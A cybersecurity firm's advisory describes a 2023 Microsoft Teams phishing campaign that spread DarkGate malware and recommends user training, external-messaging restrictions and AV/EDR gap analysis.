Overview: Researchers have found that the DarkGate malware strain is being spread through phishing campaigns in Microsoft Teams by outside parties
Risk Factor: High
Date: August 2023
Get Help Now
Solace Cyber security specialists can perform gap analysis of your current AV / EDR products to ensure all endpoints are protected.
What We Know About The Microsoft Teams Phishing Campaign Pushing DarkGate Malware
In a recent incident, security experts at Truesec noticed Microsoft Teams messages originating from third-party accounts, delivering ZIP files that purported to be from the victims HR department.
Initially, the attack commenced with a social engineering tactic aimed at enticing the recipient to click on the .zip file, which contained an LNK (shortcut) file masquerading as a PDF document.
Upon execution, this file triggered a VBScript that initiated the download of a payload utilizing curl.exe and harnessed AutoIT in conjunction with a compiled AutoIT script. The outcome of this process was the detection of the file as DarkGate Malware by VirusTotal.
The malware supports a magnitude of malicious activities including remote access tooling, cryptocurrency mining, keylogging and a built-in stealer.
Security Awareness in Microsoft Teams
Microsoft Teams, by default, permits external third parties to engage in communication through its platform. While many training resources focus on email as a potential threat vector, it’s crucial to educate your user base about the risks associated with external communications in Teams as well.
It’s worth noting that even with security measures like Microsoft Safe Links and Safe Attachments in place, they may not provide complete protection against all types of threats. As seen in the incident investigated by TrustSec, there can still be vulnerabilities and risks to address. Therefore, a multi-layered security approach that includes user awareness and training is essential to bolster your organization’s defense against evolving threats in platforms like Microsoft Teams.
Emerging Phishing Threats: What’s The Impact?
This particular phishing campaign is still in its early days.
Given the limited range of mitigation methods currently available and the probability that users have not been adequately trained to recognise this specific threat vector, they may be more susceptible to this tactic compared to traditional email-based attacks.
Solace Cyber Recommendations
Educating staff about this specific threat vector is crucial. Prioritise raising awareness, similar to efforts against email phishing attacks.
Given the restricted options for mitigation, it’s advisable to assess external messaging permissions. Administrators have the option to create an approved list of specific organisations allowed to communicate or, alternatively, block all third-party communications.
Additionally, it’s essential to conduct a comprehensive gap analysis of your existing AV (Antivirus) and EDR (Endpoint Detection and Response) solutions to guarantee that all endpoints are equipped with functioning and current protection measures.
Gap Analysis Support
Solace Cyber can perform gap analysis of your current AV / EDR products to ensure all endpoints are protected.